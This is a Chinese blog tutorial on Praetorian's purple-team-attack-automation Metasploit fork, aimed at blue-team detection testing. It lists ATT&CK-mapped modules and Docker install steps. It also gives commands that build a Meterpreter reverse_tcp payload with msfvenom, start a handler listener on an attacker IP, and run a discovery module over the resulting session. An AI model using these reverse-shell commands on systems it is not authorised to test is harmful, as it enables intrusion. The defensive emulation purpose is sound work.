purple-team-attack-automation(紫色團隊攻擊自動化)學習與研究

原創 12306小哥 2020-02-21 13:39

1. 簡介

該工具是原始metasploit框架的分支,用於模擬攻擊者的戰術,技術和程序(TTP)。該工具的主要重點是幫助Blue Teams瞭解其映射到MITER ATT&CK™框架的檢測差距。

2. 可用模塊

2.1 Windows

  • Windows:ADIDNS(PowerMad)
  • Windows:Active Directory自動發現(BloodHound)
  • Windows:數據壓縮(T1002)
  • Windows:憑證轉儲(T1003)
  • Windows:Winlogon幫助器DLL(T1004)
  • Windows:來自本地系統的數據(T1005)
  • Windows:系統服務發現(T1007)
  • Windows:應用程序窗口發現(T1010)
  • Windows:查詢註冊表(T1012)
  • Windows:端口監視器(T1013)
  • Windows:輔助功能(T1015)
  • Windows:系統網絡配置發現(T1016)
  • Windows:遠程系統發現(T1018)
  • Windows:快捷方式修改(T1023)
  • Windows:Windows遠程管理(T1028)
  • Windows:修改現有服務(T1031)
  • Windows:系統所有者/用戶發現(T1033)
  • Windows:路徑攔截(T1034)
  • Windows:服務執行(T1035)
  • Windows:僞裝(T1036)
  • Windows:登錄腳本(T1037)
  • Windows:文件系統權限不足(T1044)
  • Windows:Windows管理規範(T1047)
  • Windows:系統網絡連接發現(T1049)
  • Windows:新服務(T1050)
  • Windows:計劃任務(T1053)
  • Windows:流程注入(T1055)
  • Windows:輸入捕獲(T1056)
  • Windows:進程發現(T1057)
  • Windows:運行鍵(T1060)
  • Windows:安全軟件發現(T1063)
  • Windows:權限組發現(T1069)
  • Windows:從工具中刪除指示器(T1070)
  • Windows:通過哈希(T1075)
  • Windows:Windows管理員共享(T1077)
  • Windows:有效帳戶(T1078)
  • Windows:文件中的憑據(T1081)
  • Windows:系統信息發現(T1082)
  • Windows:文件和目錄發現(T1083)
  • Windows:Windows管理規範事件訂閱(1084)
  • Windows:Rundll32(T1085)
  • Windows:PowerShell(T1086)
  • Windows:帳戶發現(T1087)
  • Windows:繞過UAC(T1088)
  • Windows:禁用安全工具(T1089)
  • Windows:Windows NTFS擴展屬性(T1096)
  • Windows:帳戶操作(T1098)
  • Windows:Timestomp(T1099)
  • Windows:AppInit DLL(T1103)
  • Windows:遠程文件複製(T1105)
  • Windows:文件刪除(T1107)
  • Windows:暴力破解(T1110)
  • Windows:修改註冊表(T1112)
  • Windows:屏幕捕獲(T1113)
  • Windows:剪貼板數據(T1115)
  • Windows:Regsvr32(T1117)
  • Windows:InstallUtil(T1118)
  • Windows:自動收集(T1119)
  • Windows:外圍設備發現(T1120)
  • Windows:Regsvcs/Regasm(T1121)
  • Windows:音頻捕獲(T1123)
  • Windows:系統時間發現(T1124)
  • Windows:視頻捕獲(T1125)
  • Windows:受信任的開發人員實用程序(T1127)
  • Windows:安裝根證書(T1130)
  • Windows:身份驗證程序包(T1131)
  • Windows:網絡共享發現(T1135)
  • Windows:創建帳戶(T1136)
  • Windows:MSHTA(T1170)
  • Windows:分佈式組件對象模型(T1175)
  • Windows:屏幕保護程序(T1180)
  • Windows:CMSTP(T1191)
  • Windows:控制面板項目(T1196)
  • Windows:BITS作業(T1197)
  • Windows:密碼策略發現(T1201)
  • Windows:Kerberoasting(T1208)
  • Windows:時間提供者(T1209)
  • Windows:簽名的二進制代理執行(T1218)

2.2 Linux

  • Linux:系統網絡配置發現(T1016)
  • Linux:系統所有者/用戶發現(T1033)
  • Linux:系統網絡連接發現(T1049)
  • Linux:進程發現(T1057)
  • Linux:權限組發現(T1069)
  • Linux:系統信息發現(T1082)
  • Linux:帳戶發現(T1087)
  • Linux:文件刪除(T1107)
  • Linux:密碼策略發現(T1201)

2.3 MacOS

  • macOS:數據壓縮(T1002)
  • macOS:系統網絡配置發現(T1016)
  • macOS:網絡共享發現(T1135)
  • macOS:創建帳戶(T1136)
  • macOS:Bash歷史記錄(T1139)
  • macOS:密碼策略發現(T1201)

2.4 Multi

  • Multi:遠程系統發現(T1018)
  • Multi:網絡服務掃描(T1046)

具體可參考官方wiki介紹:https://github.com/praetorian-code/purple-team-attack-automation/wiki/Available-Modules

2.工具部署及安裝方法

2.1 docker/docker-compose安裝

apt-get install docker docker-compose

2.2 下載項目文件至本地

git clone https://github.com/praetorian-code/purple-team-attack-automation.git

2.3 修改LHOST和端口

echo "version: '3'
services:
  ms:
    environment:
    # example of setting LHOST
      LHOST: 0.0.0.0
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443
      - 80:80
" > docker-compose.local.override.yml #此文件需要自行創建,然後複製上述內容寫入文檔即可

2.4 設置COMPOSE_FILE環境變量

echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env

2.5 運行docker服務並運行工具

service docker start
docker-compose build
./docker/bin/msfconsole #當前目錄下執行此命令

在這裏插入圖片描述
其他環境安裝可參考官方說明:https://github.com/praetorian-code/purple-team-attack-automation/wiki/Installation

3. 操作與使用

3.1 生成Meterpreter有效載荷

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your locahost IP> LPORT=4444 -f exe > meterpreter.exe  #新建窗口執行命令,利用此命令生成的MSF載荷可能存在問題,建議自行修改

3.2 啓動並運行本地監聽

 use exploit/multi/handler
 set Interrupt: use the 'exit' command to quit
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST <Attacker IP Address>
 set LPORT 4444
 exploit -j -z
 # docker msfconsole中執行監聽命令

端口監聽
複製並在目標(“受害者”)主機上以管理員身份運行payload.exe,然後等待會話。
運行載荷
等待會話

3.3 查看已有TTP模塊

search purple
# docker msfconsole中執行

查找可以使用的模塊

3.4 模擬T1087

use modules/post/windows/purple/t1087 #設置要使用的TTP
info #查看TTP模塊配置
set session 1  #設置會話
run #執行載荷
#docker msfconsole中執行

選擇使用的模塊設置會話並執行

後續

安全從業人員(尤其是藍隊成員),可以利用purple-team-attack-automation模擬相關TTP,並在客戶端部署並配置相關審覈策略,記錄相關事件日誌(windows_log/sysmon/message),並轉發至大數據分析平臺(splunk/elk等)進行數據分析,提升藍隊成員對攻擊的理解以及對異常行爲的敏感度。

關於purple-team-attack-automation(紫色團隊攻擊自動化)更多信息可參考項目原址介紹:https://github.com/praetorian-code/purple-team-attack-automation

關於ATT&CK具體TTP中文介紹可參考瀚思科技MITRE ATT&CK 攻擊知識庫(企業)中文版項目:https://hansight.github.io/#/

關於ATT&CK具體TTP原文介紹可參考MITER官方介紹:https://attack.mitre.org/

12306小哥
發佈了17 篇原創文章 · 獲贊 18 · 訪問量 13萬+
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

監控滲透測試中Certutil利用行爲

簡介 Certutil.exe是作爲證書服務的一部分安裝的命令行程序。 我們可以使用此工具在目標計算機上執行惡意EXE文件,並獲取meterpreter會話。 補充說明:在高版本操作系統中,可以通過配置策略,對進程命令行參數進行記

12306Br0 2020-06-23 12:36:24

ATT&CK T1060-Registry Run Keys / Startup Folder

Mitre ATT&CK T1060-Registry Run Keys / Startup Folder(註冊表運行鍵/啓動文件夾) ATT&CK中的描述 在註冊表或啓動文件夾中向“運行鍵”添加條目將導致在用戶登陸時執行引用的程

PacketAunt 2020-07-08 08:38:52

ElasticStack搭建Java日誌收集分析,並將其構建docker鏡像-學習筆記

參考視頻(ElasticStack)https://www.bilibili.com/video/av53652729                  (Docker)           https://www.bilibili.co

sosozha 2020-07-06 22:27:37

ELK-20180413-ES curl 命令整理

Nodes Stats All Nodes # Check All Nodes Info # pretty 可以方便肉眼觀察 JSON 數據結構,當然也可以用 www.bejson.com 這個在線 JSON 格式轉換工具來看。

八刀物语 2020-07-04 17:53:18

ELK-20180411-我竟不知道 mappings 的重要性

Problem # 純小數計算 avg,結果不正確 curl -XGET http://ES_URL:9200/ES_INDEX/ES_TYPE/_search -d ' { "query": { "boo

八刀物语 2020-07-04 17:53:18

ELK-20180412-讓我們愉快地做 ES 性能調優吧

調優好多次,次次都達不到理想狀態,這次有不一樣的收穫,記錄一下,以示慶祝! 調優分兩個大致的方向吧,一個是對 ELK 集羣進行調優,其中包括 ES 的性能調優,Logstash 數據讀入時調用 bulk API 時的一些參數調優。

八刀物语 2020-07-04 17:53:18

Apache 日誌文件簡述

apache日誌分析 1. 日誌類型 訪問日誌 格式:119.79.247.29 - - [10/Jan/2015:09:40:12 +0800] "GET /api/service/friends/dynamic HTTP/1.

KDF5000 2020-07-03 12:48:16

簡單ELK平臺構建

elasticsearch 安裝 官網下載:https://www.elastic.co/downloads/elasticsearch 解壓文件到需要安裝的文件夾(不能用root用戶解壓,不能用root用戶啓動)。 配置 修改

写代码的小福贵 2020-07-03 04:30:22

搭建ELK日誌分析平臺 - 2020年7月最新版

1 需求 項目中使用Spring Cloud進行開發,需要查看每個模塊中打印的日誌。 2 解決 使用ELK完美解決。官網是這樣描述的: ELK是3個開源項目的首字母縮寫,分別是ElasticSearch、LogStash和Kibana。

94小白菜 2020-07-01 20:55:20

服務器日誌在線查看工具

最近調試接口,查看服務器日誌特別麻煩,特別開發了一個日誌查看器,可通過瀏覽器在線查看服務器日誌,脫離登錄服務器。支持歷史記錄模糊查詢、日誌實時監控。 需要的小夥伴請加羣下載273952772        

zjweii 2020-06-25 13:03:29

Windows下使用awstats6.5來分析Tomcat5.x的網站訪問日誌

1.安裝perl,下載地址: http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.6.811-MSWin32-x86-122208.msi http

pangpangde 2020-06-24 21:25:40

永恆之藍(ms17-010)復現

漏洞簡介:Eternalblue通過 TCP 端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445文件共享端口的windows機器,無需用戶任何操作,只要開機上網,就能執行惡意操作。 SMB一開始的設計

芷若。 2020-06-24 20:20:15

Windows認證/白銀票據

Window認證學習筆記 (by 12306Bro) 前言 因爲疫情導致在家辦公,正好可以利用這段時間提升一下自己,所以打算學習一下Windows認證。 windows認證     Kerberos 是一種網絡認證協議,其設計

12306Br0 2020-06-23 12:36:25

威脅狩獵終極指南

介紹 從本質上講,網絡世界中的威脅狩獵可能與現實世界中的狩獵非常相似。它需要具有獨特技能的專業人員,他們具有一定的耐心,批判性思維,創造力和敏銳的洞察力,通常以網絡行爲異常的形式發現獵物。 “但是獵人到底在尋找什麼呢?以及爲什麼我

12306Br0 2020-06-23 12:36:25

檢測和緩解PowerShell攻擊的方法

聲明:本文檔由12306Bro個人業餘時間翻譯,個人行爲與公司無任何關係!譯文來源INSIDER THREAT SECURITY BLOG博客站相關文檔。如您對翻譯文檔內容有異議,請將原文文檔做爲主要參考,原文版權由博客站及其相關

12306Br0 2020-06-23 12:36:24